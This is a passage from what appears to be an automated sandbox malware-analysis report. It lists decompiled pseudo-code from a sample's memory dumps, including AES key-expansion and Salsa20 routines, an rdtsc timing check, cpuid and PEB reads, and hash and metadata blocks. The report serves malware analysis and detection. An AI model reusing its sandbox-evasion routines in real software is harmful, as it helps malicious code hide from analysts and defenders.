                                                                                                                                                            						_t365 = ( *(0x9ce310 + (_t164 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9ce310 + (_t164 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t164 >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + (_t164 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
                                                                                                                                                            						_t180 =  *_t396 ^ _t365;
                                                                                                                                                            						_t399[8] = _t365;
                                                                                                                                                            						_t399[9] = _t180;
                                                                                                                                                            						_t98 =  &(_t399[0xc]); // 0x9c8174
                                                                                                                                                            						_t366 = _t98;
                                                                                                                                                            						_t317 =  *_t93 ^ _t180;
                                                                                                                                                            						_a12 = _t366;
                                                                                                                                                            						_t100 =  &(_t399[3]); // 0x83ec8b55
                                                                                                                                                            						_t399[0xa] = _t317;
                                                                                                                                                            						_t399[0xb] =  *_t100 ^ _t317;
                                                                                                                                                            						do {
                                                                                                                                                            							_t103 = _t366 - 4; // 0x50e0458d
                                                                                                                                                            							_t197 = _a12;
                                                                                                                                                            							_t372 =  *(0x9ce310 + ( *_t103 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + ( *_t103 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + ( *_t103 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + ( *_t103 & 0x000000ff) * 4) & 0x000000ff ^  *(_t197 - 0x20);
                                                                                                                                                            							 *_t197 = _t372;
                                                                                                                                                            							_t199 =  *(_t197 - 0x1c) ^ _t372;
                                                                                                                                                            							_t373 = _a12;
                                                                                                                                                            							 *(_t373 + 4) = _t199;
                                                                                                                                                            							_t320 =  *(_t373 - 0x18) ^ _t199;
                                                                                                                                                            							 *(_t373 + 8) = _t320;
                                                                                                                                                            							 *(_t373 + 0xc) =  *(_t373 - 0x14) ^ _t320;
                                                                                                                                                            							_t374 = _t373 + 0x20;
                                                                                                                                                            							_a12 = _t374;
                                                                                                                                                            							_t216 = _a12;
                                                                                                                                                            							_t381 =  *(0x9ce310 + ( *(_t374 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + ( *(_t374 - 0x14) >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9ce310 + ( *(_t374 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + ( *(_t374 - 0x14) & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t216 - 0x30) ^  *_a8;
                                                                                                                                                            							 *(_t216 - 0x10) = _t381;
                                                                                                                                                            							_t218 =  *(_t216 - 0x2c) ^ _t381;
                                                                                                                                                            							_t366 = _a12;
                                                                                                                                                            							 *(_t366 - 0xc) = _t218;
                                                                                                                                                            							_t324 =  *(_t366 - 0x28) ^ _t218;
                                                                                                                                                            							 *(_t366 - 8) = _t324;
                                                                                                                                                            							 *(_t366 - 4) =  *(_t366 - 0x24) ^ _t324;
                                                                                                                                                            							_t222 =  &(_a8[1]);
                                                                                                                                                            							_a8 = _t222;
                                                                                                                                                            						} while (_t222 != 0x9cfb2c);
                                                                                                                                                            						_push(0xe);
                                                                                                                                                            						L4:
                                                                                                                                                            						_pop(_t223);
                                                                                                                                                            						return _t223;
                                                                                                                                                            					}
                                                                                                                                                            					_t331 = ( *(0x9ce310 + (_t357 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9ce310 + (_t357 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t357 >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + (_t357 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
                                                                                                                                                            					_t398 = 0x9cfb14;
                                                                                                                                                            					_t239 =  *_t396 ^ _t331;
                                                                                                                                                            					_t399[6] = _t331;
                                                                                                                                                            					_t54 =  &(_t399[2]); // 0xc35de58b
                                                                                                                                                            					_t333 =  *_t54 ^ _t239;
                                                                                                                                                            					_t399[7] = _t239;
                                                                                                                                                            					_t56 =  &(_t399[3]); // 0x83ec8b55
                                                                                                                                                            					_t399[8] = _t333;
                                                                                                                                                            					_t399[9] =  *_t56 ^ _t333;
                                                                                                                                                            					_t401 =  &(_t399[0xa]);
                                                                                                                                                            					do {
                                                                                                                                                            						_t59 = _t401 - 0x18; // 0x75ff29eb
                                                                                                                                                            						_t60 = _t401 - 4; // 0xc6efe8a5
                                                                                                                                                            						_t335 =  *_t59 ^  *_t60;
                                                                                                                                                            						_t61 = _t401 - 0x14; // 0x8df98b10
                                                                                                                                                            						 *_t401 = _t335;
                                                                                                                                                            						_t401[1] =  *_t61 ^ _t335;
                                                                                                                                                            						_t63 =  &(_t401[6]); // 0xf48b89
                                                                                                                                                            						_t401 = _t63;
                                                                                                                                                            						_t388 =  *(0x9ce310 + ( *(_t401 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + ( *(_t401 - 0x14) >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9ce310 + ( *(_t401 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + ( *(_t401 - 0x14) & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t401 - 0x28) ^  *_t398;
                                                                                                                                                            						_t398 =  &(_t398[1]);
                                                                                                                                                            						 *(_t401 - 0x10) = _t388;
                                                                                                                                                            						_t259 =  *(_t401 - 0x24) ^ _t388;
                                                                                                                                                            						 *(_t401 - 0xc) = _t259;
                                                                                                                                                            						_t338 =  *(_t401 - 0x20) ^ _t259;
                                                                                                                                                            						 *(_t401 - 8) = _t338;
                                                                                                                                                            						 *(_t401 - 4) =  *(_t401 - 0x1c) ^ _t338;
                                                                                                                                                            					} while (_t398 != 0x9cfb30);
                                                                                                                                                            					_push(0xc);
                                                                                                                                                            					goto L4;
                                                                                                                                                            				}
                                                                                                                                                            				_t345 = ( *(0x9ce310 + (_t354 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9ce310 + (_t354 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t354 >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + (_t354 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
                                                                                                                                                            				_t277 =  *_t396 ^ _t345;
                                                                                                                                                            				_t399[4] = _t345;
                                                                                                                                                            				_t19 =  &(_t399[2]); // 0xc35de58b
                                                                                                                                                            				_t399[5] = _t277;
                                                                                                                                                            				_t347 =  *_t19 ^ _t277;
                                                                                                                                                            				_t399[6] = _t347;
                                                                                                                                                            				_t399[7] = _t354 ^ _t347;
                                                                                                                                                            				_t402 = 0x9cfb14;
                                                                                                                                                            				do {
                                                                                                                                                            					_t23 =  &(_t396[4]); // 0x120
                                                                                                                                                            					_t396 = _t23;
                                                                                                                                                            					_t395 =  *(0x9ce310 + (_t396[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t396[2] >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9ce310 + (_t396[2] >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + (_t396[2] & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t396 - 4) ^  *_t402;
                                                                                                                                                            					_t402 =  &(_t402[1]);
                                                                                                                                                            					_t396[3] = _t395;
                                                                                                                                                            					_t295 =  *_t396 ^ _t395;
                                                                                                                                                            					_t396[4] = _t295;
                                                                                                                                                            					_t350 = _t396[1] ^ _t295;
                                                                                                                                                            					_t396[5] = _t350;
                                                                                                                                                            					_t396[6] = _t396[2] ^ _t350;
                                                                                                                                                            				} while (_t402 != 0x9cfb38);
                                                                                                                                                            				_push(0xa);
                                                                                                                                                            				goto L4;
                                                                                                                                                            			}


Memory Dump Source
• Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
• Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 676d78977afd79957d6ff89ba78857d48d46adff626b0df1da486a8c6bff1063
• Instruction ID: 6507472469cf9189b70b003bf55df0e42c9281bfa11492d3b58c309a5d862de0
• Opcode Fuzzy Hash: 676d78977afd79957d6ff89ba78857d48d46adff626b0df1da486a8c6bff1063
• Instruction Fuzzy Hash: C3D12972B246518FD328CF2DDC90A26B7E1EB8C301745893DE49AC7359DB39E911EB90
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 69%
                                                                                                                                                            			E009C83FF(void* _a4, void* _a8) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				char _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				void _v120;
                                                                                                                                                            				signed int _t167;
                                                                                                                                                            				signed int _t198;
                                                                                                                                                            				signed int _t200;
                                                                                                                                                            				signed int _t206;
                                                                                                                                                            				signed int _t210;
                                                                                                                                                            				signed int _t216;
                                                                                                                                                            				signed int _t218;
                                                                                                                                                            				signed int _t229;
                                                                                                                                                            				signed int _t230;
                                                                                                                                                            				void* _t232;
                                                                                                                                                            				signed int _t233;
                                                                                                                                                            				signed int _t235;
                                                                                                                                                            				signed int _t236;
                                                                                                                                                            				signed int _t237;
                                                                                                                                                            				signed int _t239;
                                                                                                                                                            				signed int _t240;
                                                                                                                                                            				signed int _t241;
                                                                                                                                                            				signed int _t245;
                                                                                                                                                            				signed int _t247;
                                                                                                                                                            				signed int _t248;
                                                                                                                                                            				signed int _t249;
                                                                                                                                                            				signed int _t251;
                                                                                                                                                            				signed int _t253;
                                                                                                                                                            				signed int _t255;
                                                                                                                                                            				signed int _t257;
                                                                                                                                                            				signed int _t259;
                                                                                                                                                            				signed int _t261;
                                                                                                                                                            				signed int _t262;
                                                                                                                                                            				signed int _t263;
                                                                                                                                                            				signed int _t269;
                                                                                                                                                            				signed int _t270;
                                                                                                                                                            				void* _t272;
                                                                                                                                                            
                                                                                                                                                            				_t233 = 0x10;
                                                                                                                                                            				_v56 = 0xa;
                                                                                                                                                            				memcpy( &_v120, _a8, _t233 << 2);
                                                                                                                                                            				_t245 = _v72;
                                                                                                                                                            				_t235 = _v60;
                                                                                                                                                            				_t239 = _v64;
                                                                                                                                                            				_t269 = _v68;
                                                                                                                                                            				_t229 = _v76;
                                                                                                                                                            				_v8 = _v80;
                                                                                                                                                            				_v36 = _v84;
                                                                                                                                                            				_v24 = _v88;
                                                                                                                                                            				_v48 = _v92;
                                                                                                                                                            				_v44 = _v96;
                                                                                                                                                            				_v32 = _v100;
                                                                                                                                                            				_v20 = _v104;
                                                                                                                                                            				_v40 = _v108;
                                                                                                                                                            				_v16 = _v112;
                                                                                                                                                            				_v12 = _v116;
                                                                                                                                                            				_t167 = _v120;
                                                                                                                                                            				_v52 = _t245;
                                                                                                                                                            				_v28 = _t167;
                                                                                                                                                            				do {
                                                                                                                                                            					asm("rol eax, 0x7");
                                                                                                                                                            					_v20 = _v20 ^ _t167 + _t245;
                                                                                                                                                            					asm("rol eax, 0x9");
                                                                                                                                                            					_v24 = _v24 ^ _v20 + _v28;
                                                                                                                                                            					asm("rol eax, 0xd");
                                                                                                                                                            					_t247 = _v52 ^ _v24 + _v20;
                                                                                                                                                            					_v52 = _t247;
                                                                                                                                                            					asm("rol eax, 0x12");
                                                                                                                                                            					_v28 = _v28 ^ _v24 + _t247;
                                                                                                                                                            					asm("rol eax, 0x7");
                                                                                                                                                            					_v36 = _v36 ^ _v12 + _v32;
                                                                                                                                                            					asm("rol eax, 0x9");
                                                                                                                                                            					_t270 = _t269 ^ _v36 + _v32;
                                                                                                                                                            					_t248 = _v44;
                                                                                                                                                            					asm("rol eax, 0xd");
                                                                                                                                                            					_v12 = _v12 ^ _v36 + _t270;
                                                                                                                                                            					asm("rol eax, 0x12");
                                                                                                                                                            					_v32 = _v32 ^ _v12 + _t270;
                                                                                                                                                            					asm("rol eax, 0x7");
                                                                                                                                                            					_t240 = _t239 ^ _v8 + _t248;
                                                                                                                                                            					asm("rol eax, 0x9");
                                                                                                                                                            					_v16 = _v16 ^ _v8 + _t240;
                                                                                                                                                            					asm("rol eax, 0xd");
                                                                                                                                                            					_t249 = _t248 ^ _v16 + _t240;
                                                                                                                                                            					_v44 = _t249;
                                                                                                                                                            					asm("rol eax, 0x12");
                                                                                                                                                            					_v8 = _v8 ^ _v16 + _t249;
                                                                                                                                                            					asm("rol eax, 0x7");
                                                                                                                                                            					_t251 = _v40 ^ _t229 + _t235;
                                                                                                                                                            					_v40 = _t251;
                                                                                                                                                            					asm("rol eax, 0x9");
                                                                                                                                                            					_t253 = _v48 ^ _t251 + _t235;
                                                                                                                                                            					_v48 = _t253;
                                                                                                                                                            					asm("rol eax, 0xd");
                                                                                                                                                            					_t230 = _t229 ^ _v40 + _t253;
                                                                                                                                                            					asm("rol eax, 0x12");
                                                                                                                                                            					_t236 = _t235 ^ _t253 + _t230;
                                                                                                                                                            					asm("rol eax, 0x7");
                                                                                                                                                            					_v12 = _v12 ^ _v28 + _v40;
                                                                                                                                                            					_t198 = _v12;
                                                                                                                                                            					_v116 = _t198;
                                                                                                                                                            					asm("rol eax, 0x9");
                                                                                                                                                            					_v16 = _v16 ^ _t198 + _v28;
                                                                                                                                                            					_t200 = _v16;
                                                                                                                                                            					_v112 = _t200;
                                                                                                                                                            					asm("rol eax, 0xd");
                                                                                                                                                            					_t255 = _v40 ^ _t200 + _v12;
                                                                                                                                                            					_v40 = _t255;
                                                                                                                                                            					asm("rol eax, 0x12");
                                                                                                                                                            					_v108 = _t255;
                                                                                                                                                            					_t257 = _v28 ^ _v16 + _t255;
                                                                                                                                                            					asm("rol eax, 0x7");
                                                                                                                                                            					_v44 = _v44 ^ _v32 + _v20;
                                                                                                                                                            					_t206 = _v44;
                                                                                                                                                            					_v96 = _t206;
                                                                                                                                                            					asm("rol eax, 0x9");
                                                                                                                                                            					_v28 = _t257;
                                                                                                                                                            					_v120 = _t257;
                                                                                                                                                            					_t259 = _v48 ^ _t206 + _v32;
                                                                                                                                                            					_v48 = _t259;
                                                                                                                                                            					asm("rol eax, 0xd");
                                                                                                                                                            					_v20 = _v20 ^ _v44 + _t259;
                                                                                                                                                            					_t210 = _v20;
                                                                                                                                                            					_v104 = _t210;
                                                                                                                                                            					asm("rol eax, 0x12");
                                                                                                                                                            					_v92 = _t259;
                                                                                                                                                            					_t261 = _v32 ^ _t210 + _t259;
                                                                                                                                                            					_v32 = _t261;
                                                                                                                                                            					_v100 = _t261;
                                                                                                                                                            					_t262 = _v36;
                                                                                                                                                            					asm("rol eax, 0x7");
                                                                                                                                                            					_t229 = _t230 ^ _v8 + _t262;
                                                                                                                                                            					asm("rol eax, 0x9");
                                                                                                                                                            					_v24 = _v24 ^ _v8 + _t229;
                                                                                                                                                            					_t216 = _v24;
                                                                                                                                                            					_v88 = _t216;
                                                                                                                                                            					asm("rol eax, 0xd");
                                                                                                                                                            					_t263 = _t262 ^ _t216 + _t229;
                                                                                                                                                            					_t218 = _t263;
                                                                                                                                                            					_v36 = _t263;
                                                                                                                                                            					_v84 = _t218;
                                                                                                                                                            					asm("rol eax, 0x12");
                                                                                                                                                            					_v8 = _v8 ^ _t218 + _v24;
                                                                                                                                                            					_v80 = _v8;
                                                                                                                                                            					asm("rol eax, 0x7");
                                                                                                                                                            					_t245 = _v52 ^ _t236 + _t240;
                                                                                                                                                            					_v52 = _t245;
                                                                                                                                                            					_v72 = _t245;
                                                                                                                                                            					asm("rol eax, 0x9");
                                                                                                                                                            					_t269 = _t270 ^ _t236 + _t245;
                                                                                                                                                            					asm("rol eax, 0xd");
                                                                                                                                                            					_t239 = _t240 ^ _t269 + _t245;
                                                                                                                                                            					asm("rol eax, 0x12");
                                                                                                                                                            					_t235 = _t236 ^ _t239 + _t269;
                                                                                                                                                            					_t134 =  &_v56;
                                                                                                                                                            					 *_t134 = _v56 - 1;
                                                                                                                                                            					_t167 = _v28;
                                                                                                                                                            				} while ( *_t134 != 0);
                                                                                                                                                            				_v76 = _t229;
                                                                                                                                                            				_v64 = _t239;
                                                                                                                                                            				_t241 = 0;
                                                                                                                                                            				_v60 = _t235;
                                                                                                                                                            				_t232 = _a8 -  &_v120;
                                                                                                                                                            				_v68 = _t269;
                                                                                                                                                            				do {
                                                                                                                                                            					 *((intOrPtr*)(_t272 + _t241 * 4 - 0x74)) =  *((intOrPtr*)(_t272 + _t241 * 4 - 0x74)) +  *((intOrPtr*)(_t272 + _t232 + _t241 * 4 - 0x74));
                                                                                                                                                            					_t241 = _t241 + 1;
                                                                                                                                                            				} while (_t241 < 0x10);
                                                                                                                                                            				_t237 = 0x10;
                                                                                                                                                            				return memcpy(_a4,  &_v120, _t237 << 2);
                                                                                                                                                            			}


Memory Dump Source
• Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
• Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
Yara matches
Similarity
• Opcode ID: 94389a93e62d7c07f5c1ac272210a142c76ffef6fb536e77bacda6aa42c1b665
• Instruction ID: a712ea0afbb79ac16a46be5bc38ef81d99a6b9ee38f56e5a42c92859f6af8c60
• Opcode Fuzzy Hash: 94389a93e62d7c07f5c1ac272210a142c76ffef6fb536e77bacda6aa42c1b665
• Instruction Fuzzy Hash: B3A17CB6D002099FCF80CFA9C981ADEFBF5FF88254F24416AD414F7211E274AA558F54
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                            			E009C585D(signed char __eax, signed int __edx, signed char* _a4) {
                                                                                                                                                            				void* _v5;
                                                                                                                                                            				signed char _v12;
                                                                                                                                                            				signed char _v20;
                                                                                                                                                            				signed char _t11;
                                                                                                                                                            				void* _t12;
                                                                                                                                                            				void* _t14;
                                                                                                                                                            				signed char _t19;
                                                                                                                                                            				void* _t23;
                                                                                                                                                            				signed char _t25;
                                                                                                                                                            				signed char _t28;
                                                                                                                                                            				signed int _t29;
                                                                                                                                                            				signed int _t31;
                                                                                                                                                            				signed char _t32;
                                                                                                                                                            				signed int _t34;
                                                                                                                                                            				void* _t36;
                                                                                                                                                            				signed int _t38;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				void* _t42;
                                                                                                                                                            
                                                                                                                                                            				_t29 = __edx;
                                                                                                                                                            				_t11 = __eax;
                                                                                                                                                            				_t23 = 0;
                                                                                                                                                            				do {
                                                                                                                                                            					asm("rdtsc");
                                                                                                                                                            					_t32 = _t11;
                                                                                                                                                            					_t12 = E009C5907();
                                                                                                                                                            					asm("rdtsc");
                                                                                                                                                            					_v20 = _t12 - _t32;
                                                                                                                                                            					asm("sbb ecx, edi");
                                                                                                                                                            					_v12 = _t29;
                                                                                                                                                            					_t14 = E009C5907();
                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                            					asm("rdtsc");
                                                                                                                                                            					asm("sbb edx, [ebp-0x8]");
                                                                                                                                                            					_t11 = _t14 - _t25 - _t32;
                                                                                                                                                            					_v20 = _t11;
                                                                                                                                                            					asm("sbb edx, edi");
                                                                                                                                                            					_t31 = _v12;
                                                                                                                                                            					_t38 = _t31;
                                                                                                                                                            					if(_t38 <= 0 && (_t38 < 0 || _t25 <= 0xffffffff)) {
                                                                                                                                                            						_t40 = _t29;
                                                                                                                                                            						if(_t40 <= 0 && (_t40 < 0 || _t11 <= 0xffffffff)) {
                                                                                                                                                            							_t34 = _t25 - _t11;
                                                                                                                                                            							asm("sbb edi, edx");
                                                                                                                                                            							asm("cdq");
                                                                                                                                                            							_t11 = _t31 ^ _t29;
                                                                                                                                                            							_t36 = (_t34 ^ _t29) - _t29;
                                                                                                                                                            							_t42 = _t36;
                                                                                                                                                            							asm("sbb eax, edx");
                                                                                                                                                            							_v12 = _t11;
                                                                                                                                                            							if(_t42 >= 0 && (_t42 > 0 || _t36 >= 0x40)) {
                                                                                                                                                            								_v5 = E009C5791(_t25);
                                                                                                                                                            								_t19 = E009C5791(_v20);
                                                                                                                                                            								_t28 = _v5;
                                                                                                                                                            								_t11 = _t19 ^ _t28;
                                                                                                                                                            								if(_t11 != 0) {
                                                                                                                                                            									 *_a4 = _t28;
                                                                                                                                                            									return 1;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t23 = _t23 + 1;
                                                                                                                                                            				} while (_t23 < 0x80);
                                                                                                                                                            				return 0;
                                                                                                                                                            			}






















                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: time$Time$BeginPeriodSleep
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4118631919-0
                                                                                                                                                            • Opcode ID: fc29b22b782b8560c203740e77577da81cb83bbd114b6084b10493fc8158ca25
                                                                                                                                                            • Instruction ID: d7f2355037f86e0e65aec7caf5905ad7e78a6ce3ac6c19c933630defb84ba35c
                                                                                                                                                            • Opcode Fuzzy Hash: fc29b22b782b8560c203740e77577da81cb83bbd114b6084b10493fc8158ca25
                                                                                                                                                            • Instruction Fuzzy Hash: 62110B35E10AA45B9F18AE7C4840F9DBBF6DFC5760B2B877DE828D3180D571A8C44A52
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                            			E009C4B58(intOrPtr __edx, intOrPtr _a4) {
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				char _v28;
                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                            				intOrPtr* _t24;
                                                                                                                                                            
                                                                                                                                                            				_t13 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v12 = _a4;
                                                                                                                                                            				do {
                                                                                                                                                            					_push(_t17);
                                                                                                                                                            					asm("cpuid");
                                                                                                                                                            					_t24 = _t17;
                                                                                                                                                            					_t17 =  &_v28;
                                                                                                                                                            					 *_t17 = _t13 + 0x80000002;
                                                                                                                                                            					 *((intOrPtr*)(_t17 + 4)) = _t24;
                                                                                                                                                            					_t13 = _v8 + 1;
                                                                                                                                                            					 *((intOrPtr*)(_t17 + 8)) = 0;
                                                                                                                                                            					 *((intOrPtr*)(_t17 + 0xc)) = __edx;
                                                                                                                                                            					_v8 = _t13;
                                                                                                                                                            					asm("movsd");
                                                                                                                                                            					asm("movsd");
                                                                                                                                                            					asm("movsd");
                                                                                                                                                            					asm("movsd");
                                                                                                                                                            					_v12 = _v12 + 0x10;
                                                                                                                                                            				} while (_t13 < 3);
                                                                                                                                                            				return _a4;
                                                                                                                                                            			}










                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 47c376b581d24c7d1e1a0f35ff1822e68f57d00c0a892bdfc065d503b3469f08
                                                                                                                                                            • Instruction ID: ff1aa343a29f2be42e35cd93a076d1569af93059654c32eb191b24d238f8a3a3
                                                                                                                                                            • Opcode Fuzzy Hash: 47c376b581d24c7d1e1a0f35ff1822e68f57d00c0a892bdfc065d503b3469f08
                                                                                                                                                            • Instruction Fuzzy Hash: 29F012B1D01208AFCB45CF5DD88569EFBF5EF49264F2581AAEC08EB301D2719E408BD0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C5387() {
                                                                                                                                                            
                                                                                                                                                            				return ( *( *[fs:0x30] + 0xa4) & 0x000000ff) << 0x00000008 |  *( *[fs:0x30] + 0xa8) & 0x000000ff;
                                                                                                                                                            			}



                                                                                                                                                            0x009c53a3

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • Opcode ID: 509f6a94fdf042510e336dd1cc9cd65acd2f16b80682f34016c6142793c3d862
                                                                                                                                                            • Instruction ID: 2f92208e2cd7eb6c465aa2c1d9d9ad2e0d5e4d52fdcf87f58a77acdaf95c176a
                                                                                                                                                            • Opcode Fuzzy Hash: 509f6a94fdf042510e336dd1cc9cd65acd2f16b80682f34016c6142793c3d862
                                                                                                                                                            • Instruction Fuzzy Hash: 15B092682066D149C396621582B83B07FA0EB83556F2800FD94EB0E883855E021BDB11
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C4FB9() {
                                                                                                                                                            
                                                                                                                                                            				return  *[fs:0x30];
                                                                                                                                                            			}



                                                                                                                                                            0x009c4fbf

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
